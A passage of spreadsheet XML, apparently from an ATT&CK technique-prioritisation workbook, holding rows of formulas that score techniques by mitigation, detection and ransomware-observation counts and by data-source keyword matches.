        <v>0</v>
      </c>
      <c r="R214" s="52" t="s">
        <v>349</v>
      </c>
      <c r="S214" s="51">
        <v>9</v>
      </c>
      <c r="T214" s="52" t="s">
        <v>937</v>
      </c>
      <c r="U214" s="51">
        <v>14</v>
      </c>
      <c r="V214" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0.21904761904761905</v>
      </c>
      <c r="W214">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>23</v>
      </c>
      <c r="X214">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0.41818181818181815</v>
      </c>
      <c r="Y214">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0.41818181818181815</v>
      </c>
      <c r="Z214">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>0</v>
      </c>
      <c r="AA214">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0</v>
      </c>
      <c r="AB214">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AC214" s="29" t="s">
        <v>938</v>
      </c>
      <c r="AD214" s="25" t="str" cm="1">
        <f t="array" ref="AD214">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC214)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AE214" s="25">
        <f>IF(AD214="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0</v>
      </c>
      <c r="AF214" s="25" t="str" cm="1">
        <f t="array" ref="AF214">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC214)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AG214" s="25">
        <f>IF(AF214="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH214" s="25" t="str" cm="1">
        <f t="array" ref="AH214">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC214)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AI214" s="25">
        <f>IF(AH214="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0.13200000000000001</v>
      </c>
      <c r="AJ214" s="25" t="str" cm="1">
        <f t="array" ref="AJ214">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC214)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK214" s="25">
        <f>IF(AJ214="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL214" s="25" t="str" cm="1">
        <f t="array" ref="AL214">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC214)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM214" s="25">
        <f>IF(AL214="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN214" s="60">
        <v>1</v>
      </c>
      <c r="AO214" s="51">
        <v>1</v>
      </c>
      <c r="AP214" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>6.9449523809523808E-2</v>
      </c>
      <c r="AQ214" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>0.1203873015873016</v>
      </c>
      <c r="AR214" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>0.1203873015873016</v>
      </c>
      <c r="AS214" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AT214" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AU21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15" spans="1:47">
      <c r="A215" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>6.9449523809523808E-2</v>
      </c>
      <c r="B215" s="25">
        <f>SUM(H215,M215,V215)*(1+SUM(AE215,AG215,AI215,AK215,AM215))</f>
        <v>0.3611619047619048</v>
      </c>
      <c r="C215" s="25" t="s">
        <v>939</v>
      </c>
      <c r="D215" s="25" t="s">
        <v>170</v>
      </c>
      <c r="E215" s="25" t="s">
        <v>940</v>
      </c>
      <c r="F215" s="51">
        <v>1</v>
      </c>
      <c r="G215" s="51">
        <v>1</v>
      </c>
      <c r="H215" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I215">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J215">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K215">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L215">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M215" s="25">
        <v>0</v>
      </c>
      <c r="N215" s="51">
        <v>0</v>
      </c>
      <c r="O215" s="51">
        <v>2</v>
      </c>
      <c r="P215" s="51">
        <v>2</v>
      </c>
      <c r="Q215" s="51">
        <v>0</v>
      </c>
      <c r="R215" s="52" t="s">
        <v>941</v>
      </c>
      <c r="S215" s="51">
        <v>8</v>
      </c>
      <c r="T215" s="52" t="s">
        <v>942</v>
      </c>
      <c r="U215" s="51">
        <v>13</v>
      </c>
      <c r="V215" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0.21904761904761905</v>
      </c>
      <c r="W215">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>21</v>
      </c>
      <c r="X215">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0.38181818181818183</v>
      </c>
      <c r="Y215">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0.38181818181818183</v>
      </c>
      <c r="Z215">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>4</v>
      </c>
      <c r="AA215">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0.04</v>
      </c>
      <c r="AB215">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0.04</v>
      </c>
      <c r="AC215" s="29" t="s">
        <v>943</v>
      </c>
      <c r="AD215" s="25" t="str" cm="1">
        <f t="array" ref="AD215">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC215)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AE215" s="25">
        <f>IF(AD215="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0</v>
      </c>
      <c r="AF215" s="25" t="str" cm="1">
        <f t="array" ref="AF215">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC215)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG215" s="25">
        <f>IF(AF215="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH215" s="25" t="str" cm="1">
        <f t="array" ref="AH215">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC215)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AI215" s="25">
        <f>IF(AH215="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0.13200000000000001</v>
      </c>
      <c r="AJ215" s="25" t="str" cm="1">
        <f t="array" ref="AJ215">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC215)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK215" s="25">
        <f>IF(AJ215="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL215" s="25" t="str" cm="1">
        <f t="array" ref="AL215">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC215)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM215" s="25">
        <f>IF(AL215="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN215" s="52">
        <v>1</v>
      </c>
      <c r="AO215" s="51">
        <v>1</v>
      </c>
      <c r="AP215" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>6.9449523809523808E-2</v>
      </c>
      <c r="AQ215" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>0.1203873015873016</v>
      </c>
      <c r="AR215" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>0.1203873015873016</v>
      </c>
      <c r="AS215" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AT215" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AU21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16" spans="1:47" ht="32.1">
      <c r="A216" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>4.2433333333333337E-2</v>
      </c>
      <c r="B216" s="25">
        <f>SUM(H216,M216,V216)*(1+SUM(AE216,AG216,AI216,AK216,AM216))</f>
        <v>0.42433333333333334</v>
      </c>
      <c r="C216" s="25" t="s">
        <v>944</v>
      </c>
      <c r="D216" s="25" t="s">
        <v>233</v>
      </c>
      <c r="E216" s="25" t="s">
        <v>945</v>
      </c>
      <c r="F216" s="51">
        <v>1</v>
      </c>
      <c r="G216" s="51">
        <v>1</v>
      </c>
      <c r="H216" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I216">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J216">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K216">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L216">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M216" s="25">
        <v>0</v>
      </c>
      <c r="N216" s="51">
        <v>0</v>
      </c>
      <c r="O216" s="51">
        <v>0</v>
      </c>
      <c r="P216" s="51">
        <v>0</v>
      </c>
      <c r="Q216" s="51">
        <v>0</v>
      </c>
      <c r="R216" s="52" t="s">
        <v>946</v>
      </c>
      <c r="S216" s="51">
        <v>10</v>
      </c>
      <c r="T216" s="52" t="s">
        <v>947</v>
      </c>
      <c r="U216" s="51">
        <v>13</v>
      </c>
      <c r="V216" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0.21904761904761905</v>
      </c>
      <c r="W216">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>23</v>
      </c>
      <c r="X216">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0.41818181818181815</v>
      </c>
      <c r="Y216">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0.41818181818181815</v>
      </c>
      <c r="Z216">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>0</v>
      </c>
      <c r="AA216">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0</v>
      </c>
      <c r="AB216">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AC216" s="29" t="s">
        <v>948</v>
      </c>
      <c r="AD216" s="25" t="str" cm="1">
        <f t="array" ref="AD216">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC216)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AE216" s="25">
        <f>IF(AD216="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0.19800000000000001</v>
      </c>
      <c r="AF216" s="25" t="str" cm="1">
        <f t="array" ref="AF216">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC216)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG216" s="25">
        <f>IF(AF216="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH216" s="25" t="str" cm="1">
        <f t="array" ref="AH216">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC216)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AI216" s="25">
        <f>IF(AH216="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0.13200000000000001</v>
      </c>
      <c r="AJ216" s="25" t="str" cm="1">
        <f t="array" ref="AJ216">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC216)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK216" s="25">
        <f>IF(AJ216="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL216" s="25" t="str" cm="1">
        <f t="array" ref="AL216">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC216)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM216" s="25">
        <f>IF(AL216="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN216" s="52">
        <v>0</v>
      </c>
      <c r="AO216" s="51">
        <v>0</v>
      </c>
      <c r="AP216" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>4.2433333333333337E-2</v>
      </c>
      <c r="AQ216" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>0.14144444444444446</v>
      </c>
      <c r="AR216" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>0.14144444444444446</v>
      </c>
      <c r="AS216" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT216" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU21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17" spans="1:47">
      <c r="A217" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>4.1800000000000011E-2</v>
      </c>
      <c r="B217" s="25">
        <f>SUM(H217,M217,V217)*(1+SUM(AE217,AG217,AI217,AK217,AM217))</f>
        <v>0.41800000000000009</v>
      </c>
      <c r="C217" s="25" t="s">
        <v>949</v>
      </c>
      <c r="D217" s="25" t="s">
        <v>197</v>
      </c>
      <c r="E217" s="25" t="s">
        <v>950</v>
      </c>
      <c r="F217" s="51">
        <v>1</v>
      </c>
      <c r="G217" s="51">
        <v>1</v>
      </c>
      <c r="H217" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I217">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J217">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K217">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L217">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M217" s="25">
        <v>0</v>
      </c>
      <c r="N217" s="51">
        <v>0</v>
      </c>
      <c r="O217" s="51">
        <v>1</v>
      </c>
      <c r="P217" s="51">
        <v>0</v>
      </c>
      <c r="Q217" s="51">
        <v>0</v>
      </c>
      <c r="R217" s="52" t="s">
        <v>951</v>
      </c>
      <c r="S217" s="51">
        <v>8</v>
      </c>
      <c r="T217" s="51" t="s">
        <v>419</v>
      </c>
      <c r="U217" s="51">
        <v>14</v>
      </c>
      <c r="V217" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0.21428571428571433</v>
      </c>
      <c r="W217">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>22</v>
      </c>
      <c r="X217">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0.4</v>
      </c>
      <c r="Y217">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0.4</v>
      </c>
      <c r="Z217">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>1</v>
      </c>
      <c r="AA217">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0.01</v>
      </c>
      <c r="AB217">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0.01</v>
      </c>
      <c r="AC217" s="29" t="s">
        <v>399</v>
      </c>
      <c r="AD217" s="25" t="str" cm="1">
        <f t="array" ref="AD217">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC217)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AE217" s="25">
        <f>IF(AD217="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0.19800000000000001</v>
      </c>
      <c r="AF217" s="25" t="str" cm="1">
        <f t="array" ref="AF217">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC217)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG217" s="25">
        <f>IF(AF217="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH217" s="25" t="str" cm="1">
        <f t="array" ref="AH217">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC217)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AI217" s="25">
        <f>IF(AH217="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0.13200000000000001</v>
      </c>
      <c r="AJ217" s="25" t="str" cm="1">
        <f t="array" ref="AJ217">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC217)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK217" s="25">
        <f>IF(AJ217="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL217" s="25" t="str" cm="1">
        <f t="array" ref="AL217">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC217)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM217" s="25">
        <f>IF(AL217="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN217" s="62">
        <v>0</v>
      </c>
      <c r="AO217" s="51">
        <v>0</v>
      </c>
      <c r="AP217" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>4.1800000000000011E-2</v>
      </c>
      <c r="AQ217" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>0.13933333333333336</v>
      </c>
      <c r="AR217" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>0.13933333333333336</v>
      </c>
      <c r="AS217" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT217" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU21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18" spans="1:47" ht="48">
      <c r="A218" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>4.1800000000000011E-2</v>
      </c>
      <c r="B218" s="25">
        <f>SUM(H218,M218,V218)*(1+SUM(AE218,AG218,AI218,AK218,AM218))</f>
        <v>0.41800000000000009</v>
      </c>
      <c r="C218" s="25" t="s">
        <v>952</v>
      </c>
      <c r="D218" s="25" t="s">
        <v>358</v>
      </c>
      <c r="E218" s="25" t="s">
        <v>953</v>
      </c>
      <c r="F218" s="51">
        <v>1</v>
      </c>
      <c r="G218" s="51">
        <v>1</v>
      </c>
      <c r="H218" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I218">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J218">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K218">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L218">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M218" s="25">
        <v>0</v>
      </c>
      <c r="N218" s="51">
        <v>0</v>
      </c>
      <c r="O218" s="51">
        <v>0</v>
      </c>
      <c r="P218" s="51">
        <v>1</v>
      </c>
      <c r="Q218" s="51">
        <v>0</v>
      </c>
      <c r="R218" s="52" t="s">
        <v>954</v>
      </c>
      <c r="S218" s="51">
        <v>13</v>
      </c>
      <c r="T218" s="51" t="s">
        <v>955</v>
      </c>
      <c r="U218" s="51">
        <v>9</v>
      </c>
      <c r="V218" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0.21428571428571433</v>
      </c>
      <c r="W218">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>22</v>
      </c>
      <c r="X218">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0.4</v>
      </c>
      <c r="Y218">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0.4</v>
      </c>
      <c r="Z218">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>1</v>
      </c>
      <c r="AA218">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0.01</v>
      </c>
      <c r="AB218">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0.01</v>
      </c>
      <c r="AC218" s="29" t="s">
        <v>956</v>
      </c>
      <c r="AD218" s="25" t="str" cm="1">
        <f t="array" ref="AD218">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC218)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AE218" s="25">
        <f>IF(AD218="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0.19800000000000001</v>
      </c>
      <c r="AF218" s="25" t="str" cm="1">
